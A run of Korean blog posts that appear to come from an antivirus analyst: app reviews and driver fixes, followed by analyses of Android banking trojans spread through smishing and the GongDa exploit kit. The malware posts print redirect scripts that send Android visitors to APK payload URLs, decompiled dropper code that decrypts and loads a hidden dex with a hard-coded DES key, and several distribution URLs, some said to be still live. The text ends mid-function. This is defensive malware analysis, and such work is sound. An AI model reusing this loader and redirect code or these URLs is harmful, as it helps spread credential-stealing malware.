천지인 키보드의 단점을 보완한 키보드이지만, 천지인보다는 인기가 덜한 키보드


* 베가 (스카이)

팬텍 계열 스마트폰에서 기본으로 제공하는 키보드(사용자에 따라 호불호가 나뉜다)


* 나랏글

LG 계열 스마트폰에서 기본으로 제공하는 키보드

(항간에는 천지인보다 편하다는 사람들이 많다)

※ 알키보드는 키보드의 종류가 많아서 사용자 단말기 종류에 구애받지 않아서 참 좋은거 같다.



- 테마 기능

알키보드는 Default, White, Blue, Peach, black, iceCreamSandwich 총 6개의 테마를 선택할 수 있다.


개인적으로는 깜끔한 기본 Default 테마가 가장 마음에 든다.

그 이유는 빨간색, 흰색, 검은색, 초록색, 파란색, 회색등이 섞여서 가시성이 높아지기 때문이다.


아래의 그림처럼 자신이 원하는 테마를 골라서 사용하면 된다.

여성분이라면 아무래도 Peach 를 많이 쓰지 않나 싶다^^

 

 

 



- 확장성 기능

알키보드는 사용자가 키보드를 사용하는데 있어, 최대한 도움을 주려고 노력하는 것이 느껴진다.

키보드의 키를 길게 눌러 특수문자를 사용하거나, 사용자가 미리 입력한 사용구를 제공하는 것들이 그 이유다.

 


다른 확장기능으로는 키보드에 숫자키이동키(화살표)등을 On / Off 할 수있다.

숫자키는 키보드 상단에 나오는 숫자키를 이야기하는거며,

이동키(화살표)는 인터넷 가입화면이나 사용자가 입력을 연속으로 할 시 아주 편하게 커서를 이동시켜주는 기능이다.

(이동키는 아래 우측 그림의 "▲▼전체선택◀▶" <- 요렇게 생긴 키이다)

 



- 설정 기능

설정 기능은 키보드, 테마, 확장성 기능 이외의 자잘한 옵션들을 조절 할 수 있다


* 키 누를 때 진동/소리/팝업 옵션

진동의 세기, 소리의 크기등을 사용자가 자유롭게 설정할 수 있다.

 

* 레이아웃 설정

레이아웃에서는 사용자 손에 맞게 세로,가로의 키 크기를 조절할 수 있다.

아래의 그림에서는 기본값의 키보드 크기와, 최대화 했을 시 키보드를 비교했다.

 

 



* 기능설정

기능설정에서는 사용자가 입력한 단어를 유추하여 추천단어를 표시하거나 다음 누를 예측키의 크기 등을 수정 할 수 있다.

(※ 추천단어는 두벌식, 단모음에서만 지원하고 있다.)

 



이로써 "리뷰 2 - 주요기능 및 설정" 를 마치고, 

다음편에는 "삼성 키보드와 알키보드" 와의 차이점에 대해 알아보자^^


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




※ 해당 포스팅은 리뷰 이벤트에 참여하기 위해 작성한 글임을 미리 알려드립니다.



이번에 소개할 제품은 이스트소프트의 자랑거리인 알툴즈에서 최신에 공개한 알키보드(Alkeyboard) 어플리케이션이다.


2014년 스마트폰을 사용하는 사용자들이 점점 늘어남에 따라 기본적인 삼성, LG, 팬턴 등 다양한 자기들만의 키보드를 고집한다.

이에 알툴즈는 사용자가 직접 커스텀 마이징이 가능한 알키보드를 선보여 사용자들에게 인기를 얻고 있다.




□ 알키보드와 관련 된 내용


그래서 처리의 블로그에서는 알키보드에 대한 리뷰를 시작하려 한다.

리뷰는 총 5단계로 진행 될 예정이다.

리뷰 1 - 설치방법 및 CPU 점유량

리뷰 2 - 주요기능 및 설정

리뷰 3 - 알키보드 사용 예시(SNS, 메일, 문서, 게임)

리뷰 4 - 삼성 키보드와 비교

리뷰 5 - 알키보드의 장,단점


※ 현재 알키보드는 안드로이드용으로만 출시되었으며, iOS 버전은 추후 되지 않을까 싶다.

(iOS에서 키보드 배경을 바꾸기 위해서 탈옥을 해야 하나?! 기억이 잘 안난다;;)



해당 포스트에서 진행 할 리뷰는 "설치방법 및 CPU 점유량" 이다.


우선 이번 리뷰에 사용 된 안드로이드 단말기의 정보이다.

- 기기명 : 갤럭시 S4 (SHV-E300S)


- 안드로이드 버전 : 4.4.2 Kitkat(킷캣)


- 메모리 : 32GB


- 모바일 네트워크 : LTE



그럼 이제 알키보드를 설치하는 방법부터 알아보자.


알키보드 설치는 아주 간단하다.

사용하는 안드로이드 단말기에서 "Play 스토어" 앱을 통해 "알키보드 or ALKeyboard" 로 검색하면 해당 어플을 설치할 수 있다.

 



알키보드 설치가 완료 되다면, 이제 알키보드 어플리케이션을 실행 해 보자.


"ALKeyboard 시작하기"를 튜토리얼을 통해 "키보드 및 입력방식"에서 "알키보드" 를 선택하고,

"사용하고 싶은 키보드 종류"를 선택하면 된다.


마지막으로 "키보드 테마"를 선택하면 기본적인 설치는 끝이 난다.

 

 

 





설치는 끝났으나, 자세한 기능 및 사용방법에 대해서는 다음 리뷰 때 설명하며 알키보드의 CPU 점유량 및 메모리에 대해 알아보자.

CPU 점유량은 알키보드가 프로세스에 올려졌을 때, 사용되는 점유량을 확인하였다.

(CPU 점유량을 확인하기 위해 사용 된 어플리케이션은 "CPU Monitor" 를 사용하였다.)


확인결과, 알키보드는 CPU를 약 6% 정도 사용하고 메모리를 34MB 정도 점유하고 있는 것으로 확인되었다.

또한 설치 된 용량은 3.93MB 로 크지 않다^^

 


다음 리뷰에서는 리뷰의 꽃이라 불리는 주요기능 및 설정에 대해서 알아보자~!!



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





경찰청 사이버안전국(이전, 사이버 테러 대응센터)에서 국민들의 인터넷 사기 피해를 예방하고자 "경찰청 사이버캅" 이라는 

어플리케이션을 공개했다.


사이버캅이라는 이름답게 보안프로그램으로 볼 수 있지만, 이는 보안 프로그램과는 다른 성향의 알림 및 조회 어플리케이션이다.


특히, 사기 범죄에 이용 된 전화번호로 전화가 오면 사용자에게 직관적으로 보여주므로 스마트폰이나 보안에 잘 모르는 

부모님 세대에게 설치해 드리면 좋을 듯 하다.


이외에는 그다지 이렇다 할 기능은 없어서 리뷰는 간략하게 마친다.


관련 된 내용의 뉴스는 아래에서 확인하면 된다.



다운로드는 아래의 링크에서 받으면 되며, 스마트폰을 많이 사용하시는 분들은 한번 설치 해 보시기 바랍니다.


- 구글 플레이 사이트 : https://play.google.com/store/apps/details?id=kr.go.police.cybercop

현재 저희 '경찰청 사이버캅' 은 [안드로이드 4.1.2] 버젼에 최적화 되어 있습니다.


안드로이드 4.0 버젼 부터 그 이상의 버젼을 지원하며 

그외의 버젼에 대해서는 향후 테스트 후 지원 할 수 있도록 노력 하겠습니다.


□ ‘경찰청 사이버캅’ 의 주요 기능

○ 전화나 문자가 오면 인터넷 사기 범죄에 이용된 번호인지 화면에 표출하여, 거래 전 상대방의 신뢰도를 확인

- 인터넷으로 물품을 거래 할 때, 판매자의 계좌번호나 전화번호가 인터넷 사기에 이용된 번호인지 검색 기능 제공

- 신규 스미싱 수법 경보령 등 사이버범죄 피해 예방을 위한 공지사항을 Push 방식으로 제공

- 경보령 등 알림 확인

- 최신 이슈를 이용해 국민을 현혹하는 신종 범죄에 대한 내용을 신속하게 국민과 공유함으로써 피해 예방



 


 

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.






지난 6월 18일경 2014년 브라질 월드컵 관련 스미싱 문구들이 발견되어서 포스팅을 준비하다가 이상한 APK 파일을 보게 되었다.


분석을 다 하고 나니, 비슷한 경우가 이전에도 있었던것으로 보인다.

(이전에는 "ypt.db" 파일이 아닌 "ds" 파일로 유포가 되었던거 같다.)


아래의 내용은 실제 브라질 월드컵 스미싱 문자를 수신받은 문자 내용이다.

- 브라질 월드컵 거리응원 ‘무한도전’이간다 함께 참여합시다 sbsfune.krsbs.com

- 월드컵 거리응원 교통통제 미리체크 확인 sbsfune.krsbs.com

- 브라질 월드컵 거리응원장소 어디 일까요?응원장소 확인 sbsfun.krsbs.com


※ 현재는 링크가 모두 차단되어 Full URL 공개!!



링크를 따라가보니, 이것도 좀 귀찮은 형태로 APK 파일을 다운로드를 시키고 있었다.

<script type="text/javascript">

 var browser =

 {

   versions: function ()

   {

     var u = navigator.userAgent, app = navigator.appVersion;

     return

     {

       ios: !!u.match(/\(i[^;

       ]+;

       ( U;

       )? CPU.+Mac OS X/),

       android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,

       iPhone: u.indexOf('iPhone') > -1,

       iPad: u.indexOf('iPad') > -1,

     };

   }

   (),

 }

 if (browser.versions.android)

 {

   window.location.href = "http://126.15.84.44/play.apk";

 }

 </script>


Navigator 객체의 속성

  - appCodeName : 브라우저의 코드명을 반환

  - appName : 현재 사용중인 브라우저의 이름을 반환

  - appVersion : 현재 사용중인 브라우저의 버전을 반환

  - userAgent : 브라우저의 이름, 버전, 코드를 포함하는 문자열을 반환

  - minetype : mine 형식의 정보를 반환(오브젝트)

  - plugins : plugin 정보를 반환(오브젝트)

  - language : 현재 브라우저가 사용하는 언어를 반환. 익스플로러에서는 지원하지 않음

  - platform : 사용중인 시스템 코드를 반환. 윈도 95/98/NT는 Win32를 반환


* 코드 분석

사용자의 브라우저 정보를 통해 안드로이드 일 때만 play.apk 파일을 자동으로 다운로드 시킴



위의 스크립트는 이전에 확인하였던 Mobile User Agent 구분을 통해 리다이렉션 시키는 스크립트이다.


단지 틀린점이라곤 Android 뿐만아니라, MAc, Linux, iPhone, iPad까지 확인을 한다는 점이다.



암튼 이렇게 해서 결론적으로 play.apk를 다운로드 받게 된다.

다운로드 받은 play.apk 파일은 보기에는 지극히 정상적인(?) 악성파일로 보였다.



dex분석을 위해 dex2jar를 이용하여 classes.dex 파일을 디컴파일 했다.



그런데 악성행위는 없고, "android.content.res.AssetManager" 를 이용하여 assets 폴더의 파일을 읽는 부분이 눈에 보였다.

private Resources getResource()

  {

    Resources localResources1 = null;

    try

    {

      Class localClass = Class.forName("android.content.res.AssetManager");

      Object localObject = localClass.newInstance();

      Method localMethod = localClass.getDeclaredMethod("addAssetPath", new Class[] { String.class });

      Object[] arrayOfObject1 = new Object[1];

      arrayOfObject1[0] = this.apkFileName;

      localMethod.invoke(localObject, arrayOfObject1);

      localResources1 = getBaseContext().getResources();

      Class[] arrayOfClass = new Class[3];

      arrayOfClass[0] = localClass;

      arrayOfClass[1] = localResources1.getDisplayMetrics().getClass();

      arrayOfClass[2] = localResources1.getConfiguration().getClass();

      Constructor localConstructor = Resources.class.getConstructor(arrayOfClass);

      Object[] arrayOfObject2 = new Object[3];

      arrayOfObject2[0] = localObject;

      arrayOfObject2[1] = localResources1.getDisplayMetrics();

      arrayOfObject2[2] = localResources1.getConfiguration();

      Resources localResources2 = (Resources)localConstructor.newInstance(arrayOfObject2);

      return localResources2;

    }

    catch (Exception localException)

    {

      localException.printStackTrace();

    }

    return localResources1;

  }



그래서 assets 폴더를 들어가봤다.

assets 폴더에 "ypt.db" 파일이 존재했다.



그럼 ypt.db 파일이 무슨 역활을 하는지 한번 에디터 프로그램을 통해 확인했더니, 뭔가 암호화 된 파일로 보였다.



그래서 다시 디컴파일 된 classes.dex 파일을 확인해 봤다.

역시 ypt.db 파일을 가지고 노는 부분이 확인됬다.


코드 상, ypt.db 파일을 DES 암호화 방식을 통해 "gjaoun" 키값을 통해 복호화하여 x.zip 라는 파일로 저장하는 것을 확인하였다.

private void loadClass(Context paramContext)

  {

    String str1 = "/data/data/" + paramContext.getPackageName() + "/";

    this.apkFileName = ("/data/app/" + paramContext.getPackageName() + "-1.apk");

    String str2 = str1 + "x.zip";

    String str3 = str1 + "x";

    try

    {

      InputStream localInputStream = getAssets().open("ypt.db");

      Log.v("cmd", "get Input Ok");

      int i = localInputStream.available();

      Log.v("cmd", "数据大小:" + i);

      byte[] arrayOfByte1 = new byte[i];

      localInputStream.read(arrayOfByte1, 0, i);

      byte[] arrayOfByte2 = new DesUtils("gjaoun").decrypt(arrayOfByte1);

      FileOutputStream localFileOutputStream = new FileOutputStream(str2);

      localFileOutputStream.write(arrayOfByte2);

      localFileOutputStream.close();

      Log.v("cmd", "ds数据读取完毕");

      try

      {

        this.localDexFile = DexFile.loadDex(str2, str3, 0);

        this.localEnumeration = this.localDexFile.entries();

        if (!this.localEnumeration.hasMoreElements())

        {

          Log.v("cmd", "删除文件");

          new File(str2).delete();

          new File(str3).delete();

        }

        Log.v("cmd", "加载类");

        while (true)

        {

          if (!this.localEnumeration.hasMoreElements())

            return;

          this.localDexFile.loadClass((String)this.localEnumeration.nextElement(), paramContext.getClassLoader());

        }

      }

      catch (IOException localIOException)

      {

        localIOException.printStackTrace();

        Log.v("cmd", "IOException:" + localIOException.getMessage());

        return;

      }

    }

    catch (Exception localException)

    {

      localException.printStackTrace();

      Log.v("cmd", "Exception:" + localException.getMessage());

    }

  }


  protected void attachBaseContext(Context paramContext)

  {

    Log.v("cmd", "here");

    super.attachBaseContext(paramContext);

  }


* DES(Data Encryption Standard)

블록 암호의 일종으로, 미국 NBS (National Bureau of Standards, 현재 NIST)에서 국가 표준으로 정한 암호이다. DES는 대칭키 암호이며, 56비트의 키를 사용한다. 


EFF에서 제작한 DES 무차별 대입 공격 하드웨어.

DES는 현재 취약한 것으로 알려져 있다. 56비트의 키 길이는 현재 컴퓨터 환경에 비해 너무 짧다는 것이 하나의 원인이며, DES에 백도어가 포함되어 있어 특수한 방법을 사용하면 정부 기관에서 쉽게 해독할 수 있을 것이라는 주장도 제기되었다. 1998년에 전자 프론티어 재단(EFF)에서는 56시간 안에 암호를 해독하는 무차별 대입 공격 하드웨어를 만들었으며, 1999년에는 22시간 15분 안에 해독하는 하드웨어를 만들었다.


DES를 세 번 반복해서 사용하는 Triple-DES는 DES에 비해 안전한 것으로 알려져 있으며, 또한 현재는 DES 대신 AES(Advanced Encryption Standard)가 새 표준으로 정해져 사용되고 있다


출처 : http://ko.wikipedia.org/wiki/DES_(%EC%95%94%ED%98%B8)



나는 개발을 잘 못하니, 사내 개발자에게 복호화 루틴을 부탁해서 생성 된 x.zip 파일을  확인했다.

다른 파일들은 없고 안에는 classes.dex 파일 하나만 존재했다.



그럼 다시 dex2jar 를 통해 디컴파일을 한 후 다시 분석을 시도해보았다.

그랬더니 처음에는 보이지 않았던 악성행위에 대한 코드들이 주루륵 보였다.



결론적으로 play.apk 파일은 국내 인터넷 뱅킹(농협, 신한은행, 우리은행, 국민은행, 하나은행)의 개인정보를 노리는 

KRBanker 종류의 악성파일이다.


추가적으로 다운로드 주소는 아래와 같다.

hxxp://126.15.84.44/N.apk

hxxp://126.15.84.44/S.apk

hxxp://126.15.84.44/W.apk

hxxp://126.15.84.44/K.apk

hxxp://126.15.84.44/H.apk


또한 알약에서는 해당 파일을 Trojan.Android.KRBanker 로 탐지 중이다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




6월 17일 탐지 된 스미싱 문자 중에서 "미디어파이(mediafire)" 서버를 이용한 악성 어플리케이션 다운로드를 확인하였다.


티 클라우드(SK T Cloud), 나무 클라우드(NamuCloud), 드롭박스(DropBox), 앱박스(app.box.com), 클립투넷(clip2net.com) 에 

이어 6번째 클라우드 서버를 사용했다.


이번 클라우드 서버도 외국 서비스라 국내 서비스보다는 처리 대응이 매우 느리다.

그나마 드롭박스는 착실하게 차단을 잘 해주든데 ㅠㅠ



이전 클라우드 서버를 이용한 스미싱 포스팅은 아래의 링크에서 확인하면 된다.


이번 미디어파이(mediafire)의 내용은 아래에서 설명하겠다. 

아래의 내용은 실제 스미싱 문자를 수신 받은 내용이다.

우편물이고객님의부재중으로반송되었습니다등기물정보확인하기 http://ckessy.org
 ㄴ http://download30.mediafire.com/4lc64ndw07og/7d7o1hbo0ey22xc/appMinicom.apk

※ 현재 유포서버가 살아있지만 내맘대로 Full Url 공개!!



해당 악성 어플리케이션 appMinicom.apk는 알약 안드로이드에서 Trojan.Android.KRBanker 로 탐지 된다.


 


※ 현재 알약 안드로이드에서는 해당 스미싱 문자를 구분하고 있으므로, 
알약 안드로이드 사용자들은 스미싱 옵션을 "On"으로 켜두기 바람!!


이번 appMinicom.apk 파일은 "금융감독원 모바일 전자공시(mDART)" 의 아이콘을 사용하여 사용자를 현혹시키고 있다.



아래의 그림들은 appMinicom.apk 어플리케이션이 사용하는 리소스 그림들이다.

 

 

 


 


 




블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




파일 암호화, Tor 사용, 돈을 요구하는 랜섬웨어(Simplocker) 어플리케이션이 ESET에 의해 발견되었다.

자세한 분석 내용은 아래 관련내용 링크에서 확인하면 된다.


■ 관련 내용



간단하게 해당 어플리케이션을 살펴보자면,

어플리케이션 실행 시 바탕화면 레이어를 아래와 같은 화면으로 고정시킨다.

(러시아어로 되어있는데, 그냥 260 UAH(우크라이나 화폐)를 보내면 24시간안에 풀어주겠다 정도 되는듯 ;;)



SD Scard를 스캔하여 아래와 같은 파일이 존재하면 "AES 암호화 방식"을 이용하여 암호화 시킨다.

(암호화 된 파일은 확장자 뒤 .enc 확장자를 붙인다)

- 동영상 관련

avi, mkv, 3gp, mp4


- 그림 관련

jpeg, jpg, png, bmp, gif


- 문서 관련

pdf, doc, docx, txt




또한 Tor에 접속을 시도하여, 자신의 C&C 서버를 감추려는 내용도 보인다.



해당 악성 어플리케이션은 알약 안드로이드에서 "Trojan.Android.Simplocker.A" 로 탐지된다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


주말에 자주 보이는 공다팩(GongDa Exploit Kit)으로 인하여 DBD(Drive-By-Download) 되는 APK가 이제는 
단축URL(Short URL)을 사용하기 시작했다.

단축 URL을 쓰는 이유는 디텍션 시스템들에서 자신들의 APK URL이 쉽게 노출 되어서 그런 듯 싶다.


□ 관련 내용


이번에 확인 된 URL은 아래와 같다.

http://www.websmedia.co.kr/biz/v/index.html -> GongDa Exploit Kit
ㄴ http://goo.gl/UsibrF -> Short URL

     ㄴ http://www.eplis.co.kr/shop/skin/MBN.apk -> APK Download URL

※ 링크가 차단되어 Full URL로 공개 



아래의 그림은 실제 Gongda Exploit Kit 에서 apk 다운로드가 추가 된 소스코드 내용이다.




기재 된 단축 URL로 접속하면, MBN.apk 파일을 다운로드 받을 수 있다.




다운로드 된 MBN.apk는 알약 안드로이드에서는 Trojan.Android.KRBanker 로 탐지 중이며, 
이전에 소개했던 All in One 금융 악성 어플리케이션과 거의 흡사한 파일이다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


4월 23일 안드로이드 웹스토어인 구글 플레이(Google Play)에서 악성 어플리케이션이 업로드 된 내용이 확인되었다.


이는 안랩에서 최초 확인 한 것으로 보이며, 안랩에서 공개 한 내용은 아래와 같다.


안랩에서는 해당 악성 어플리케이션을 뉴밴(New Ban)으로 명명하였으며, 20개의 은행, 21개 증권사, 10개의 카드사 서비스
페이지를 통해 계좌정보 및 비밀번호, 카드번호, CVC 번호 등 금융정보를 입력하는 창으로 통해 개인정보를 수집하는 것으로
보인다. 
(뉴밴(New Ban) 이란 New Banker 의 줄임말이 아닐까 싶다 ㅎㅎ)

어플에서 가로채는 금융 회사 리스트는 이전에 소개한 All in One(mbn.apk)랑 거의 흡사하다.
해당 어플에 대한 자세한 분석은 하지 않으며, 간략 한 이미지만 공개한다.

해당 악성 어플리케이션은 "멜로디" 라는 이름으로 구글 플레이에 등록되었지만, 현재는 삭제 된 상태이다.
이름만 봐서는 전혀 금융 탈취 어플로 보이지도 않고, 등록 된 그림으로도 그냥 개인이 사용하는 어플로만 보여진다.
(등록 된 날짜는 2014년 4월 1일로 보인다)




아래의 화면은 악성 어플리케이션 초기 화면이다.
금융 어플 답게, 여러가지 금융에 대한 내용들을 보여준다. 
또한 해당 어플리케이션은 현재 구글 플레이에 등록 된 모든은행 모든카드 라는 어플리케이션을 모방한것으로 확인된다.



국내 인터넷 뱅킹에 대한 리스트가 되어 있으며, 클릭 시 이름, 주민등록번호, 계좌번호, 계좌비밀번호, 이체 비빌번호
입력 하는 창을 보여준다. 




국내 신용카드에 대한 리스트가 되어 있으며, 클릭 시 이름, 카드번호, 유효기간, 고유번호(CVC), 카드 비밀번호,
주민등록번호
를 입력 하는 창을 보여준다. 




국내 증권회사에 대한 리스트가 되어 있으며, 클릭 시 이름, ID, ID비밀번호, 주민등록번호, 증권계좌번호, 증권계좌비밀번호
입력 하는 창을 보여준다. 



사용자가 자신의 금융 개인정보를 입력하면, 악성 어플리케이션에서는 또 다른 악성어플을 다운로드 시킨다.

다운로드 된 어플에서는 공인인증서와 문자메시지를 가로채는 역활을 수행한다.

http://211.174.***.**:8080/new****/com.android.sms.apk

※ 현재 링크가 살아있어 모자이크 처리 



이 2개의 악성어플리케이션은 알약 안드로이드에서 각각 Trojan.Android.KRBanker , Trojan.Android.SMS.Stech 으로
탐지되고 있다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


조금 지난 이슈지만, 4월 14일 탐지 된 스미싱 문자 중에서 구글 블로그인 블로거(Blogger)를 이용한 악성 어플리케이션 다운로드를
확인하였다.

악성 어플리케이션 제작자들은 점점 머리를 쓰며, 사용자를 어떻게 속일지 연구를 잘하는거 같다.
정말 박수를 쳐 줄 만 하다 ㅡㅡ;;

암튼 확인 된 스미싱 문구는 아래와 같다.

- 우편 물이 고객님의 [부재중으로] 반송 되었 습 니다 배송예정확인 http://oze.kr/Td

ㄴ http://oze.kr/Td
ㄴ http://bryestso.blogspot.kr/2014/04/blogger_11.html
ㄴ https://www.dropbox.com/s/ju4913b7xtwhfn1/syse.apk

- 해당 URL은 스미싱 문자를 확인 할 수 없었다.
ㄴhttp://bryestso.blogspot.kr/2014/04/blogger.html
ㄴhttps://www.dropbox.com/s/up0hpnrznem5ixz/kr1.apk

- 고객님 택배가 부재중으로 반송되었습니다 정보확인.http://oze.kr/Zd
ㄴhttp://oze.kr/Zd 
ㄴhttp://specialpageem.blogspot.jp/2014/04/blogger.html
ㄴhttps://www.dropbox.com/s/3h6rdgbe6i7kvzk/%ED%99%95%EC%9D%B8.apk


대부분 우체국 택배에 대한 스미싱 문구였으며, 스미싱 문구의 단축 URL을 클릭하면 아래의 그림과 같이 블로거 블로그를 통해
사용자가 직접 악성 어플을 다운을 받을 수 있다.




블로거의 소스를 보면, 단축 URL의 경로가 대부분 드롭박스로 연결 되는 것을 알 수 있다.



드롭박스로 연결 된 악성 어플리케이션은 아래와 같이 syse.apk, kr1.apk, 확인.apk 같이 다운로드가 된다.




알약 안드로이드에서는 해당 어플들을 "Trojan.Android.SMS.Stech" 로 탐지 하고 있다.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



지난 24일 "멜론 크랙 어플"에 이어 "롤 관전 어플" 이라는 조크 변종 어플리케이션이 발견되었다.

관련 된 내용은 아래와 같다.

이번에 발견 된 "롤 관전 어플" 은 네이버 블로그에서 첨부파일 형태가 아닌, 포스팅 형태로 발견되었다.
동작내용은 이전 "멜론 크랙 어플"과 동일하다.









현재 알약에서는 해당 어플을 "Misc.Android.Joke" 으로 명명하여 탐지 되고 있다.

※ 조크(Joke)는 시스템에 악의적인 영향을 주진 않지만, 사용자에게 불편함을 주는 프로그램이다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


지난 20일 SK텔레콤(SK Telecom) 이동통신사의 통신장애가 약 6시간정도 문제가 발생 된 사례가 있었다.
SK텔레콤에서는 24분만에 시스템을 복구 하였다고 하지만, 실제 사용자들은 약 6시간정도의 불편함을 느꼇다고 한다.



이에 SK텔레콤은 25일 오후 6시부터 지난 20일에 발생한 통신장애에 대한 피해 고객들에게 보상금액을 확인할 수 있는
대상자 조회 시스템를 공개했다.


이는 SKT 통신장애로 인한 피해고객들은 별도의 신청 절차없이 다음달 통신 요금서에서 일괄적으로 감액처리 된다고 한다.


하지만 사용자들은 더큰 불만의 목소리를 제기했다.

생각보다 보상금액이 적었기 때문이 아닌가 생각된다.

암튼, 보상금액이 얼마나 되는지 나도 알아보기로 했다.

- SKT 서비스 장애 요금감액 및 보상대상자 조회 사이트
PC용 : https://cs.sktelecom.com

모바일용 : https://cs.sktelecom.com/m.html



나는 우선 모바일용으로 확인을 해보았다.
모바일용으로 접속하게 되면 아래와 같이 조회하기를 클릭하여 이름과 생년월일, 전화번호를 입력하면 된다.

 



나는 젠장 1,118원 ㅡㅡ;; 이거로 모하냐 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ




근데 웃긴건 여기에서도 개인정보를 동의하란다 ㅡㅡ;;

 



참고로 SK텔레콤에서는 이번 통신장애 보상 조회에 관련된 스미싱 문구가 확인되었다고 하니 주의하기 바람!!
(음...우리쪽으로는 단 한건도 없었는데...진짜 있었을까;;)



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



저번주 주말에 "멜론 크랙 어플 주의" 라는 말이 떠돌았다.


운 좋게 지인분이 샘플을 보내주어서 확인을 해보았더니, 악성 어플리케이션으로 진단하기에는 조금 난감한 부분이 있었다.

하지만 분명 사용자에게 설치 된다면 불편을 초래 할 내용은 분명했다.

- 관련 링크

 

그래서 파일을 간략하게 분석해보았다.
 

우선 파일 실행 시 이상한 반복적인 문자열을 메인창으로 띄우게 되어 있으며, 사용자는 강제로 창을 내리지 못하도록 되어있다.


아래는 실제 어플리케이션 실행 시 보여지는 창화면이다.



동시에 리소스로 가지고 있던 음악파일을 실행시킨다.

음악파일은 "ang.mp3" 로 어떤 남자가 "앙앙" 신음소리 같은 소리를 낸다.


더 재수없는건 오디오 관리자를 통해 무조건 소리를 MAX로 올린다는 점이다.



내용을 좀 찾아보니 감염 영상이 있었다 ㅋㅋㅋ
이 동영상에서 "앙앙"의 실체를 볼 수 있다 ㅎㅎㅎㅎㅎ 



현재 알약에서는 해당 어플을 "Misc.Android.Joke" 으로 명명하여 탐지 되고 있다.

※ 조크(Joke)는 시스템에 악의적인 영향을 주진 않지만, 사용자에게 불편함을 주는 프로그램이다.



해당 어플리케이션 감염 시 안전모드 부팅으로 해당 어플을 삭제 할 수 있다.


※ 안드로이드 단말기 안전모드 부팅 방법

안드로이드 OS를 사용하는 단말기는 부팅 시 "홈버튼" 을 길게 누르고 있으면 안전모드로 부팅이 가능하다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



윈도우PC에서 안드로이드 어플리케이션을 구동시킬 수 있는 에뮬레이터 블루스택(Bluestacks)에 대해 간단하게 포스팅 한다.

그래픽 카드 버전 문제로 최신 엔비디아 지포스 그래픽카드 드라이브를 설치했는데 먼가 또 오류가 발생했다.


이번 문제는
어플리케이션 실행 시 화면이 나오지 않는 문제이다.



위의 그림을 보면, 윈드러너 실행 시 화면이 보이지 않고 초록색, 빨간색 화면만 나오는 것을 알 수 있다.

검색을 좀 해봤더니 이런 경우는 최신 엔비디아 지포스 그래픽카드 드라이브가 문제가 되는 것으로 보인다.

이전 포스팅에서 봤듯이 2014년 3월 18일 기준 지포스 최신 그래픽 카드는 GEFORCE 335.23 드라이버이다.
하지만 GEFORCE 335.23 드라이버에서는 블루스택의 그래픽을 지원하지 않는 문제로 보여진다.

그래서 이번에는 예전 버전인 GEFORCE 332.21 드라이버로 다시 설치를 해보았다.

설치 링크는 아래와 같다.


GEFORCE 332.21 드라이버를 설치 후 다시 어플리케이션을 실행 해 봤더니 이제 잘 된다 ㅠㅠ

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


윈도우PC에서 안드로이드 어플리케이션을 구동시킬 수 있는 에뮬레이터 블루스택(Bluestacks)에 대해 간단하게 포스팅 한다.


윈도우를 XP에서 Win7으로 갈아 탄 후 블루스택을 설치하려 했는데, 이런 쉣!! 또 뭔가 오류가 발생했다.
(블루스택은 설치 시, 삭제 시 오류가 발생하지 않으면 안되는 프로그램인가 보다....;;)

이번 오류는 아래와 같은 메시지가 보여진다.


Error 25000.
BlueStacks currently doesn't recognize your graphics card.
It is possible your Graphics Drivers may need to be updated.
Please update them and try installing again.


번역하자면,
블루스택이 현재 나의 그래픽카드를 인식하지 못하였으므로 
그래픽 드라이버를 업데이트 후 설치를 다시 해라 이다.

다시 말해 이 문제는 현재 설치되어 있는 컴퓨터의 그래픽카드 버전이 낮아서 문제가 생기는 오류이다.
그래서 최신 그래픽카드 버전을 설치 해 주면 된다.

참고로 나의 그래픽 카드는 "NVIDIA GeForce GTX 260" 이다.

2014년 3월 18일 기준 지포스 최신 그래픽 카드는 GEFORCE 335.23 드라이버이다.

설치 링크는 아래와 같다.


그래픽 카드를 최신으로 바꾼 후에 다시 블루스택을 설치 하였더니, 정상적으로 설치가 완료 되었다!!



※ 참고사항
자신의 그래픽카드의 종류를 모른다면??
[장치관리자]에서 [디스플레이 어뎁터]를 확인 하면 된다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



Malware Exploit Script로 유명한 공다팩(GongDa Exploit Kit, Dadong)에서 Java, SWF, IE 취약점 이외에
안드로이드 어플리케이션인 APK 파일 까지 다운로드를 시도하는 것이 포착되었다


아직까지 PC에서만큼 DBD(Drive-By-Download)가 자동으로 실행되진 않지만, 접속한 사용자의 OS Agent를 확인하여
모바일이면 APK 스크립트가 동작하여 다운로드까지는 가능할 수 있도록 코드가 추가되었다.


현재 확인 된 URL은 총 3개이다.

hxxp://naver.ejeongmin.com/kim/index.html

hxxp://naver.tendersmile.kr/kr/index.html

hxxp://www.toronsil.com/flash/cao/index.html


아래의 그림은 실제 Gongda Exploit Kit 에서 apk 다운로드가 추가 된 소스코드 내용이다.





위 코드에 삽입 된 "안드로이드 추가 다운로드" 코드는 아래와 같다.

function is_pc(){

    var os = new Array("Android","iPhone","Windows Phone","iPod","BlackBerry","MeeGo","SymbianOS");  // 페儉잚謹돨盧땡꾸鱗溝固잚謹,菱契警속

var info = navigator.userAgent;

var len = os.length;

    for (var i = 0; i < len; i++) {

        if (info.indexOf(os[i]) > 0){

if (info.indexOf("Android") > 0){

return false; 

}

}

    }

    return true;

}


if(!is_pc())

{

document.location.href = "http://www.****.or.kr/unsa.apk";

}




function is_pc(){

